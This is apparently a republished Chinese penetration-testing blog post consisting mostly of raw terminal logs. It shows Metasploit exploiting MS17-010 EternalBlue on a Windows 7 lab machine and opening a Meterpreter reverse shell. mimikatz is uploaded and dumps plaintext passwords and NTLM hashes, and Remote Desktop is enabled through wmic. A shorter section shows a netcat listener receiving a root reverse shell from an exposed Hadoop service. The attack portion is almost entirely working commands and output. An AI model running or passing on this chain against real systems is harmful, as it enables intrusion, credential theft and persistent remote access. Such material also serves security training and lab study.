(base) ➜ ~ msfconsole  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

 =[ metasploit v5.0.102-dev-37e0c7d01701fe276ef76f9e30d807261866e9df]+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post ]+ -- --=[ 562 payloads - 45 encoders - 10 nops ]+ -- --=[ 7 evasion ]
Metasploit tip: View missing module options with show missing
msf5 > search ms17-010
Matching Modules================
 # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce
msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.211.55.5rhosts => 10.211.55.5msf5 auxiliary(scanner/smb/smb_ms17_010) > set rport 445rport => 445msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[-] 10.211.55.5:445 - An SMB Login Error occurred while connecting to the IPC$ tree.[*] 10.211.55.5:445 - Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedmsf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.211.55.8rhosts => 10.211.55.8msf5 auxiliary(scanner/smb/smb_ms17_010) > set rport 445rport => 445msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.211.55.8:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)[*] 10.211.55.8:445 - Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedmsf5 auxiliary(scanner/smb/smb_ms17_010) > use ms17_010_eternalblue
Matching Modules================
 # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 1 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+

Interact with a module by name or index, for example use 1 or use exploit/windows/smb/ms17_010_eternalblue_win8
msf5 auxiliary(scanner/smb/smb_ms17_010) > use 1[-] Failed to load module: exploit/windows/smb/ms17_010_eternalblue_win8msf5 auxiliary(scanner/smb/smb_ms17_010) > use 0[-] Failed to load module: exploit/windows/smb/ms17_010_eternalblue_win8msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcpmsf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.211.55.8rhosts => 10.211.55.8msf5 exploit(windows/smb/ms17_010_eternalblue) > set rport 445rport => 445msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.1.2:4444 [*] 10.211.55.8:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check[+] 10.211.55.8:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)[*] 10.211.55.8:445 - Scanned 1 of 1 hosts (100% complete)[*] 10.211.55.8:445 - Connecting to target for exploitation.[+] 10.211.55.8:445 - Connection established for exploitation.[+] 10.211.55.8:445 - Target OS selected valid for OS indicated by SMB reply[*] 10.211.55.8:445 - CORE raw buffer dump (38 bytes)[*] 10.211.55.8:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima[*] 10.211.55.8:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service [*] 10.211.55.8:445 - 0x00000020 50 61 63 6b 20 31 Pack 1 [+] 10.211.55.8:445 - Target arch selected valid for arch indicated by DCE/RPC reply[*] 10.211.55.8:445 - Trying exploit with 12 Groom Allocations.[*] 10.211.55.8:445 - Sending all but last fragment of exploit packet[*] 10.211.55.8:445 - Starting non-paged pool grooming[+] 10.211.55.8:445 - Sending SMBv2 buffers[+] 10.211.55.8:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 10.211.55.8:445 - Sending final SMBv2 buffers.[*] 10.211.55.8:445 - Sending last fragment of exploit packet![*] 10.211.55.8:445 - Receiving response from exploit packet[+] 10.211.55.8:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)![*] 10.211.55.8:445 - Sending egg to corrupted connection.[*] 10.211.55.8:445 - Triggering free of corrupted buffer.[*] Sending stage (201283 bytes) to 192.168.1.2[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:49249) at 2020-08-08 20:00:18 +0800[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 10.211.55.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > shellProcess 2792 created.Channel 1 created.Microsoft Windows [?汾 6.1.7601]??Ȩ???? (c) 2009 Microsoft Corporation??????????Ȩ????
C:\Windows\system32>chcp 65001chcp 65001Active code page: 65001
C:\Windows\system32>ipconfig ipconfig
Windows IP Configuration

Ethernet adapter ???????? 2:
 Connection-specific DNS Suffix . : localdomain IPv6 Address. . . . . . . . . . . : fdb2:2c26:f4e4:0:7002:eaf9:c043:7b1b Temporary IPv6 Address. . . . . . : fdb2:2c26:f4e4:0:cde9:7d52:8c02:9037 Link-local IPv6 Address . . . . . : fe80::7002:eaf9:c043:7b1b%14 IPv4 Address. . . . . . . . . . . : 10.211.55.8 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : fe80::21c:42ff:fe00:18%14 10.211.55.1
Tunnel adapter isatap.localdomain:
 Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : localdomain
C:\Windows\system32>exitexitmeterpreter > shellProcess 2852 created.Channel 2 created.Microsoft Windows [?汾 6.1.7601]??Ȩ???? (c) 2009 Microsoft Corporation??????????Ȩ????
C:\Windows\system32>chcp 65001chcp 65001Active code page: 65001
C:\Windows\system32>systeminfosysteminfo
Host Name: RETURN0FA54OS Name: Microsoft Windows 7 Ultimate OS Version: 6.1.7601 Service Pack 1 Build 7601OS Manufacturer: Microsoft CorporationOS Configuration: Standalone WorkstationOS Build Type: Multiprocessor FreeRegistered Owner: return0;Registered Organization: Product ID: 00426-384-1216344-06000Original Install Date: 2020/7/13, 1:45:07System Boot Time: 2020/8/8, 14:45:29System Manufacturer: Parallels Software International Inc.System Model: Parallels Virtual PlatformSystem Type: x64-based PCProcessor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 158 Stepping 13 GenuineIntel ~2400 MhzBIOS Version: Parallels Software International Inc. 15.1.4 (47270), 2020/4/13Windows Directory: C:\WindowsSystem Directory: C:\Windows\system32Boot Device: \Device\HarddiskVolume1System Locale: zh-cn;Chinese (China)Input Locale: en-us;English (United States)Time Zone: N/ATotal Physical Memory: 4,096 MBAvailable Physical Memory: 3,313 MBVirtual Memory: Max Size: 8,189 MBVirtual Memory: Available: 7,308 MBVirtual Memory: In Use: 881 MBPage File Location(s): C:\pagefile.sysDomain: WORKGROUPLogon Server: N/AHotfix(s): 2 Hotfix(s) Installed. [01]: KB2534111 [02]: KB976902Network Card(s): 1 NIC(s) Installed. [01]: Parallels Ethernet Adapter Connection Name: 本地链接 2 DHCP Enabled: Yes DHCP Server: 10.211.55.1 IP address(es) [01]: 10.211.55.8 [02]: fe80::7002:eaf9:c043:7b1b [03]: fdb2:2c26:f4e4:0:cde9:7d52:8c02:9037 [04]: fdb2:2c26:f4e4:0:7002:eaf9:c043:7b1b
C:\Windows\system32>exitexitmeterpreter > upload /Users/return0/Desktop/tools/10内网渗透/mimikatz_trunk/x64/mimikatz.exe[*] uploading : /Users/return0/Desktop/tools/10内网渗透/mimikatz_trunk/x64/mimikatz.exe -> mimikatz.exe[*] Uploaded 1.21 MiB of 1.21 MiB (100.0%): /Users/return0/Desktop/tools/10内网渗透/mimikatz_trunk/x64/mimikatz.exe -> mimikatz.exe[*] uploaded : /Users/return0/Desktop/tools/10内网渗透/mimikatz_trunk/x64/mimikatz.exe -> mimikatz.exemeterpreter > shellProcess 1088 created.Channel 4 created.Microsoft Windows [?汾 6.1.7601]??Ȩ???? (c) 2009 Microsoft Corporation??????????Ȩ????
C:\Windows\system32>whoamiwhoamint authority\system
C:\Windows\system32>chcp 65001chcp 65001Active code page: 65001C:\Windows\system32>mimikatz.exemimikatz.exe
 .#####. mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # sekurlsa::logopasswordsERROR mimikatz_doLocal ; "logopasswords" command of "sekurlsa" module not found !
Module : sekurlsaFull name : SekurLSA moduleDescription : Some commands to enumerate credentials...
 msv - Lists LM & NTLM credentials wdigest - Lists WDigest credentials kerberos - Lists Kerberos credentials tspkg - Lists TsPkg credentials livessp - Lists LiveSSP credentials ssp - Lists SSP credentials logonPasswords - Lists all available providers credentials process - Switch (or reinit) to LSASS process context minidump - Switch (or reinit) to LSASS minidump context bootkey - Set the SecureKernel Boot Key to attempt to decrypt LSA Isolated credentials pth - Pass-the-hash krbtgt - krbtgt! dpapisystem - DPAPI_SYSTEM secret trust - Antisocial backupkeys - Preferred Backup Master keys tickets - List Kerberos tickets ekeys - List Kerberos Encryption Keys dpapi - List Cached MasterKeys credman - List Credentials Manager
mimikatz # sekurlsa::logonPasswords
Authentication Id : 0 ; 73647 (00000000:00011faf)Session : Interactive from 1User Name : return0Domain : RETURN0FA54Logon Server : RETURN0FA54Logon Time : 2020/8/8 14:45:41SID : S-1-5-21-2676871807-2807053931-1165176819-1000 msv :  [00000003] Primary * Username : return0 * Domain : RETURN0FA54 * LM : b47f9a39939fbe2e3cfeb463bfee415c * NTLM : 52dec73c7fb089d8917fbdf7985b6036 * SHA1 : f072ae3248a49934bd3d472cdf8ffcaffa74f7bf tspkg :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! wdigest :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! kerberos :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! ssp :  credman : 
Authentication Id : 0 ; 73594 (00000000:00011f7a)Session : Interactive from 1User Name : return0Domain : RETURN0FA54Logon Server : RETURN0FA54Logon Time : 2020/8/8 14:45:41SID : S-1-5-21-2676871807-2807053931-1165176819-1000 msv :  [00000003] Primary * Username : return0 * Domain : RETURN0FA54 * LM : b47f9a39939fbe2e3cfeb463bfee415c * NTLM : 52dec73c7fb089d8917fbdf7985b6036 * SHA1 : f072ae3248a49934bd3d472cdf8ffcaffa74f7bf tspkg :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! wdigest :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! kerberos :  * Username : return0 * Domain : RETURN0FA54 * Password : woshidashabi! ssp :  credman : 
Authentication Id : 0 ; 997 (00000000:000003e5)Session : Service from 0User Name : LOCAL SERVICEDomain : NT AUTHORITYLogon Server : (null)Logon Time : 2020/8/8 14:45:40SID : S-1-5-19 msv :  tspkg :  wdigest :  * Username : (null) * Domain : (null) * Password : (null) kerberos :  * Username : (null) * Domain : (null) * Password : (null) ssp :  credman : 
Authentication Id : 0 ; 996 (00000000:000003e4)Session : Service from 0User Name : RETURN0FA54$Domain : WORKGROUPLogon Server : (null)Logon Time : 2020/8/8 14:45:40SID : S-1-5-20 msv :  tspkg :  wdigest :  * Username : RETURN0FA54$ * Domain : WORKGROUP * Password : (null) kerberos :  * Username : return0fa54$ * Domain : WORKGROUP * Password : (null) ssp :  credman : 
Authentication Id : 0 ; 30280 (00000000:00007648)Session : UndefinedLogonType from 0User Name : (null)Domain : (null)Logon Server : (null)Logon Time : 2020/8/8 14:45:39SID :  msv :  tspkg :  wdigest :  kerberos :  ssp :  credman : 
Authentication Id : 0 ; 999 (00000000:000003e7)Session : UndefinedLogonType from 0User Name : RETURN0FA54$Domain : WORKGROUPLogon Server : (null)Logon Time : 2020/8/8 14:45:39SID : S-1-5-18 msv :  tspkg :  wdigest :  * Username : RETURN0FA54$ * Domain : WORKGROUP * Password : (null) kerberos :  * Username : return0fa54$ * Domain : WORKGROUP * Password : (null) ssp :  credman : 
mimikatz # exitBye!C:\Windows\system32>wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1Executing (\\RETURN0FA54\ROOT\CIMV2\TerminalServices:Win32_TerminalServiceSetting.ServerName="RETURN0FA54")->SetAllowTSConnections()Method execution successful.Out Parameters:instance of __PARAMETERS{ ReturnValue = 0;};C:\Windows\system32>exit

漏洞利用-Hadoop未受权访问Getshell

Last login: Sat Aug 8 19:54:07 on ttys001(base) ➜ ~ nc -l 8888bash: cannot set terminal process group (211): Inappropriate ioctl for devicebash: no job control in this shell<33412_0001/container_1596872533412_0001_01_000001# whoamiwhoamiroot<33412_0001/container_1596872533412_0001_01_000001# ifconfigifconfigeth0 Link encap:Ethernet HWaddr 02:42:ac:1a:00:02  inet addr:172.26.0.2 Bcast:172.26.255.255 Mask:255.255.0.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:17365 errors:0 dropped:0 overruns:0 frame:0 TX packets:34456 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0  RX bytes:1858357 (1.7 MiB) TX bytes:5760591 (5.4 MiB)
lo Link encap:Local Loopback  inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:8 errors:0 dropped:0 overruns:0 frame:0 TX packets:8 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000  RX bytes:647 (647.0 B) TX bytes:647 (647.0 B)
<33412_0001/container_1596872533412_0001_01_000001# ididuid=0(root) gid=0(root) groups=0(root)<33412_0001/container_1596872533412_0001_01_000001# exit

说句题外话

本来是这样的

结果是这样的

最后就变成了这样的

感谢您耐着性子看到了这儿。完整版在语雀里，若是想看完整版，欢迎加入个人语雀团队，有意组一个队，毕竟一我的非常孤独，但愿有更多人来和我一块儿完善和积淀语雀文库，记录本身所学所得所悟。能够经过微信公众号私信我便可。我会告诉你怎么加入。（有门槛，可是不高，目的是为了查看你适合不适合加入）

本文分享自微信公众号 - 攻防SRC（SNNUSRC）。
若有侵权，请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”，欢迎正在阅读的你也加入，一块儿分享。